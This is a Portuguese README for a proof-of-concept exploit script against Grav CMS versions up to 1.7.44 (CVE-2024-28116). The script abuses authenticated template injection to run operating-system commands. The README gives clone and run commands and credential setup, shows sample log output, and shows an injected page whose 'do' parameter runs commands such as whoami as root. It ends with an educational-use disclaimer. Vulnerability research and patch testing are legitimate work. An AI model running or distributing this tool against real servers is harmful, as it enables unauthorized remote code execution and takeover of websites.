
é um script Python de PoC que explora uma vulnerabilidade autenticada de Injeção de Template no Lado do Servidor (SSTI) no Grav CMS versões <= 1.7.44 (CVE-2024-28116)
GenGravSSTIExploit é um script Python PoC que explora uma vulnerabilidade autenticada de Injeção de Template no Lado do Servidor (SSTI) no Grav CMS versões <= 1.7.44 (CVE-2024-28116). Essa vulnerabilidade permite que um usuário com permissões de editor execute comandos do sistema operacional em um servidor remoto.
Nota: Este script requer credenciais válidas para autenticar no console do Grav CMS.
requests (instalar com pip install requests)Clone o Repositório
git clone https://github.com/geniuszly/GenGravSSTIExploit
cd GenGravSSTIExploit
Configure as Credenciais
Edite o script para fornecer suas credenciais de editor do Grav CMS:
GRAV_USER = "youruser"
GRAV_PASSWORD = "yourpassword"
Execute o Script
Use o seguinte comando para executar o script:
python GenGravSSTIExploit.py -t <TARGET_URL> -p <PORT>
<TARGET_URL>: URL alvo no formato http[s]://hostname.<PORT>: Número da porta (padrão é 80).Exemplo:
python GenGravSSTIExploit.py -t http://example.com -p 8080
Interaja com o Exploit
Se o exploit for bem-sucedido, você receberá uma URL onde poderá executar comandos do SO:
[+] Payload RCE injetado. Visite a página maliciosa: http://example.com:8080/poc_<ID>?do=<command>
python GenGravSSTIExploit.py -t http://example.com -p 8080
O script executará cada etapa, fornecendo atualizações pelo terminal. Aqui está o que você pode ver:
2024-10-02 12:00:01 - INFO - Verificando URL alvo...
2024-10-02 12:00:02 - INFO - Obtendo session cookie e login-nonce...
2024-10-02 12:00:03 - INFO - Tentando autenticação no Grav CMS...
2024-10-02 12:00:04 - INFO - Acessando o painel administrativo após autenticação...
2024-10-02 12:00:05 - INFO - Criando nova página...
2024-10-02 12:00:06 - INFO - Obtendo form-nonce e unique_form_id...
2024-10-02 12:00:07 - INFO - Injetando payload RCE...
2024-10-02 12:00:08 - INFO - [+] Injeção RCE bem-sucedida. Visite o link: http://example.com:8080/poc_4T7B?do=<command>
Após a conclusão do script, você verá uma mensagem com o link para a página injetada. Você pode visitar este link para executar comandos do sistema operacional:
http://example.com:8080/poc_4T7B?do=whoami
Visitar a URL com o comando especificado exibirá a saída diretamente na página:
Saída do comando:
root
Esta ferramenta destina-se apenas a fins educacionais. Use-a com responsabilidade e apenas em sistemas onde você tenha permissão explícita. O autor não se responsabiliza por qualquer uso indevido ou dano causado por este script.